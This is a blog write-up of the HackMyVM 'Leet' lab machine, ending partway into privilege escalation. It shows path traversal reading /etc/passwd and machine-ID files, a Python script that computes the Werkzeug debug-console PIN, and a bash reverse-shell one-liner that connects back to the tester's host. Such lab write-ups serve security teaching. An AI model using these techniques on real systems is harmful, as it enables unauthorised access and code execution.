{"id":711,"date":"2024-07-01T19:13:02","date_gmt":"2024-07-01T11:13:02","guid":{"rendered":"http:\/\/162.14.82.114\/?p=711"},"modified":"2024-07-09T11:50:01","modified_gmt":"2024-07-09T03:50:01","slug":"hmv-_-leet","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/711\/07\/01\/2024\/","title":{"rendered":"hmv[-_-]Leet"},"content":{"rendered":"<h1>Leet<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911415.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911415.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701145522686\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911417.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911417.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701152011662\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ rustscan -a 192.168.0.197 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83c\udf0dHACK THE PLANET\ud83c\udf0d\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.0.197:22\nOpen 192.168.0.197:7777\nPORT     STATE SERVICE REASON  VERSION\n22\/tcp   open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)\n| ssh-hostkey: \n|   256 e1:5d:7c:b7:07:92:17:dc:46:76:7d:be:a9:50:43:d2 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO40ZPJ7m6D4U6cVDKC0tpGfvjWc4qisOha\/4Lw8EEp8kxB8aDZMMiVoZwc8s+H60NNwTUBsp9iZc\/8ZgrPlgn8=\n|   256 a0:f3:b3:86:93:f5:58:82:88:dd:e5:10:db:35:de:62 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJt60Bt5N10kc53Nwgf1AM9fZ+78Y0MS7Yq8tYoL7r8i\n7777\/tcp open  http    syn-ack Werkzeug httpd 3.0.1 (Python 3.11.2)\n| http-methods: \n|_  Supported Methods: GET HEAD OPTIONS POST\n|_http-server-header: Werkzeug\/3.0.1 Python\/3.11.2\n|_http-title: Site doesn&#039;t have a title (text\/html; charset=utf-8).\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.197:7777\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.197:7777\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              bak,txt,html,php,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/download             (Status: 
500) [Size: 14478]\nProgress: 19456 \/ 1323366 (1.47%)[ERROR] Get &quot;http:\/\/192.168.0.197:7777\/1756&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.0.197:7777\/1756.php&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.0.197:7777\/1756.zip&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.0.197:7777\/1756.bak&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)<\/code><\/pre>\n<p>It looks like the scan cannot get through.<\/p>\n<h3>Vulnerability Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ nikto -h http:\/\/192.168.0.197:7777\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n---------------------------------------------------------------------------\n+ 0 host(s) tested<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Service Probing<\/h3>\n<p>I searched for OpenSSH vulnerabilities but found nothing, so I probed port <code>7777<\/code>:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911419.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911419.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"image-20240701152412099\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Not much there. I looked at the page source and found nothing either, so I tested the input box by entering <code>whoami<\/code>:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911420.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911420.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701152510282\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>I searched for it and found a <a href=\"https:\/\/www.robertecker.com\/hp\/research\/leet-converter.php?lang=en\">website<\/a>:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911421.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911421.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701152944331\" 
style=\"zoom:50%;\" \/><\/div><\/p>\n<p>I asked GPT:<\/p>\n<blockquote>\n<p>The &quot;L33T converter&quot; you mention usually refers to a tool that converts text into so-called &quot;leet speak&quot; or &quot;1337 speak&quot;. This language conversion is a form of slang that replaces letters with similar-looking digits or symbols, common in internet culture, especially in the early hacker and geek communities.<\/p>\n<p>In the example you gave:<\/p>\n<ul>\n<li>Input: <code>whoami<\/code><\/li>\n<li>Output: <code>wh04m1<\/code><\/li>\n<\/ul>\n<p>The conversion rules here are roughly as follows:<\/p>\n<ul>\n<li><code>o<\/code> is replaced with <code>0<\/code> (because the two look alike)<\/li>\n<li><code>a<\/code> is replaced with <code>4<\/code> (because <code>a<\/code> resembles an upside-down <code>4<\/code> in some fonts)<\/li>\n<li><code>i<\/code> is replaced with 
<code>1<\/code> (because the two look alike)<\/li>\n<\/ul>\n<p>The main purpose of this conversion is to hide the real meaning of a message in chats or forums, making it less obvious to people who are unfamiliar with this language. However, it may also be used for malicious purposes, such as obfuscating or hiding malicious commands or information.<\/p>\n<\/blockquote>\n<h3>File Inclusion<\/h3>\n<p>I took a look at that sensitive directory:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911422.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911422.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701162147041\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>The Flask framework may have debug mode enabled, and the console does indeed exist:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911423.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911423.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701162225439\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>But it is locked. Looking at the other paths, I found that the download URL is: <code>http:\/\/192.168.0.197:7777\/download?filename=converted_text.txt<\/code><\/p>\n<p>Check whether file inclusion is possible:<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.197:7777\/download?filename=..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\n<p>The file can be read normally:<\/p>\n<pre><code class=\"language-bash\">root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List 
Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nriva:x:1000:1000:,,,:\/home\/riva:\/bin\/bash<\/code><\/pre>\n<h3>Calculating the PIN<\/h3>\n<p>To calculate the PIN, refer to <code>https:\/\/github.com\/wdahlenburg\/werkzeug-debug-console-bypass<\/code>:<\/p>\n<pre><code class=\"language-python\"># get_pin.py\nimport hashlib\nfrom itertools import chain\n\nprobably_public_bits = [\n    &#039;riva&#039;,\n    &#039;flask.app&#039;,\n    &#039;Flask&#039;,\n    &#039;\/opt\/project\/venv\/lib\/python3.11\/site-packages\/flask\/app.py&#039;\n]\n\nprivate_bits = [\n    &#039;8796756626246&#039;,\n    &#039;d4e6cb65d59544f3331ea0425dc555a1&#039;\n]\n\nh = hashlib.sha1() # or hashlib.md5()\nfor bit in chain(probably_public_bits, private_bits):\n    if not bit:\n        continue\n    if isinstance(bit, str):\n        bit = bit.encode(&#039;utf-8&#039;)\n    h.update(bit)\nh.update(b&#039;cookiesalt&#039;)\n#h.update(b&#039;shittysalt&#039;)\n\ncookie_name = &#039;__wzd&#039; + h.hexdigest()[:20]\n\nnum = None\nif num is None:\n    h.update(b&#039;pinsalt&#039;)\n    num = (&#039;%09d&#039; % int(h.hexdigest(), 16))[:9]\n\nrv = None\nif rv is None:\n    for group_size in 5, 4, 3:\n        if len(num) % group_size == 0:\n            rv = &#039;-&#039;.join(num[x:x + group_size].rjust(group_size, &#039;0&#039;)\n                          for x in range(0, len(num), group_size))\n            break\n    else:\n        rv = 
num\n\nprint(rv)<\/code><\/pre>\n<p>Adapting it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ python                                                                                            \nPython 3.11.8 (main, Feb  7 2024, 21:52:08) [GCC 13.2.0] on linux\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n>&gt;&gt; 0x0800278dcb46\n8796756626246<\/code><\/pre>\n<p>Then read three files:<\/p>\n<pre><code class=\"language-bash\">\/etc\/machine-id\n# f6791f240ce6407ea271e86b78ac3bdb\n\/proc\/sys\/kernel\/random\/boot_id\n# \n\/proc\/self\/cgroup\n# <\/code><\/pre>\n<p>But some of them could not be read. Later the expert <code>ta0<\/code> told me that they cannot be read from Windows, but they can be from Kali...<\/p>\n<p>I tried reading them. Since I had looked at the hosts file earlier and found a hostname mapping, I configured it:<\/p>\n<pre><code class=\"language-text\">127.0.0.1   localhost\n127.0.1.1   leet.hmv\n\n# The following lines are desirable for IPv6 capable hosts\n::1     localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters<\/code><\/pre>\n<p>Trying curl:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ cat \/etc\/hosts \n127.0.0.1       localhost\n127.0.1.1       kali\n10.160.107.159  adria.hmv\n\n::1             localhost ip6-localhost ip6-loopback\nff02::1         ip6-allnodes\nff02::2         ip6-allrouters\n\n192.168.0.165   leet.hmv\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ curl 
http:\/\/leet.hmv:7777\/download?filename=..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd\n^C\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ wget http:\/\/leet.hmv:7777\/download?filename=..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd\n--2024-07-01 05:37:27--  http:\/\/leet.hmv:7777\/download?filename=..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd\nResolving leet.hmv (leet.hmv)... 192.168.0.165\nConnecting to leet.hmv (leet.hmv)|192.168.0.165|:7777... connected.\nHTTP request sent, awaiting response... ^C<\/code><\/pre>\n<p>Trying to read it with the browser on Kali:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911424.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911424.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701174356662\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>Also empty... After reading a few more times it suddenly worked again (the <code>boot_id<\/code> in the middle took 7 reads, although it is of no use):<\/p>\n<pre><code class=\"language-bash\">\/etc\/machine-id\n# f6791f240ce6407ea271e86b78ac3bdb\n\/proc\/sys\/kernel\/random\/boot_id\n# da68b9a7-336e-40df-879a-f38a6447bfe9\n\/proc\/self\/cgroup\n# 0::\/system.slice\/flaskapp.service<\/code><\/pre>\n<p>Obtaining the machine ID:<\/p>\n<pre><code 
class=\"language-python\"># tools.py\nmachine_id = b&quot;&quot;\nfor filename in &quot;machine-id&quot;, &quot;boot_id&quot;:\n    try:\n        with open(filename, &quot;rb&quot;) as f:\n            value = f.readline().strip()\n    except OSError:\n        continue\n\n    if value:\n        machine_id += value\n        break\ntry:\n    with open(&quot;cgroup&quot;, &quot;rb&quot;) as f:\n        machine_id += f.readline().strip().rpartition(b&quot;\/&quot;)[2]\nexcept OSError:\n    pass\n\nprint(machine_id)<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ vim tools.py  \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ echo &quot;f6791f240ce6407ea271e86b78ac3bdb&quot; &gt; machine-id\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ echo &quot;da68b9a7-336e-40df-879a-f38a6447bfe9&quot; &gt; boot_id\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ echo &quot;0::\/system.slice\/flaskapp.service&quot; &gt; cgroup    \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ chmod +x tools.py                 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ python3 tools.py \nb&#039;f6791f240ce6407ea271e86b78ac3bdbflaskapp.service&#039;<\/code><\/pre>\n<pre><code class=\"language-python\"># exp.py\nimport hashlib\nfrom itertools import chain\n\nprobably_public_bits = [\n    &#039;riva&#039;,\n    &#039;flask.app&#039;,\n    &#039;Flask&#039;,\n    &#039;\/opt\/project\/venv\/lib\/python3.11\/site-packages\/flask\/app.py&#039;\n]\n\nprivate_bits = [\n    &#039;8796760530867&#039;,\n    &#039;f6791f240ce6407ea271e86b78ac3bdbflaskapp.service&#039;\n]\n\nh = hashlib.sha1()\nfor bit in chain(probably_public_bits, private_bits):\n    if not bit:\n        continue\n    if isinstance(bit, str):\n        bit = bit.encode(&#039;utf-8&#039;)\n    
h.update(bit)\nh.update(b&#039;cookiesalt&#039;)\n\ncookie_name = &#039;__wzd&#039; + h.hexdigest()[:20]\n\nnum = None\nif num is None:\n    h.update(b&#039;pinsalt&#039;)\n    num = (&#039;%09d&#039; % int(h.hexdigest(), 16))[:9]\n\nrv = None\nif rv is None:\n    for group_size in 5, 4, 3:\n        if len(num) % group_size == 0:\n            rv = &#039;-&#039;.join(num[x:x + group_size].rjust(group_size, &#039;0&#039;)\n                          for x in range(0, len(num), group_size))\n            break\n    else:\n        rv = num\n\nprint(rv)<\/code><\/pre>\n<p>I tried for a long time without success. Then, on a sudden inspiration, I replaced <code>riva<\/code> with <code>www-data<\/code>, and it worked...<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911425.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911425.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701180327809\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>Getting a shell:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911426.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  
decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911426.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701180852578\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">__import__(&#039;os&#039;).popen(&#039;whoami&#039;).read();\n__import__(&#039;os&#039;).system(&#039;bash -c &quot;bash -i &gt;&amp; \/dev\/tcp\/192.168.0.143\/1234 0&gt;&amp;1&quot;&#039;)<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911427.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911427.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701181425747\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Privilege Escalation via micro<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@leet.hmv:\/opt\/project$ cd ~\n(remote) www-data@leet.hmv:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 Feb 14 21:00 .\ndrwxr-xr-x 12 root root 4096 Feb 12 11:27 ..\ndrwxr-xr-x  2 root root 4096 Feb 14 21:00 html\n(remote) www-data@leet.hmv:\/var\/www$ cd html\n(remote) www-data@leet.hmv:\/var\/www\/html$ sudo -l\nMatching Defaults entries for www-data on leet:\n    env_reset, mail_badpass, 
secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser www-data may run the following commands on leet:\n    (riva) NOPASSWD: \/usr\/bin\/micro\n(remote) www-data@leet.hmv:\/var\/www\/html$ file \/usr\/bin\/micro\n\/usr\/bin\/micro: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, Go BuildID=ZGN4-PEgidp0GQFC2DhN\/npFl-ZmzE1stSjkF3ozz\/9KOuVtA_3CSCIt1HL-lM\/Huh9eaBrgytFpqcC9L-9, stripped\n(remote) www-data@leet.hmv:\/var\/www\/html$ sudo -u rive \/usr\/bin\/micro\nsudo: unknown user rive\nsudo: error initializing audit plugin sudoers_audit<\/code><\/pre>\n<p>It turns out to be an editor:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911428.png'><img 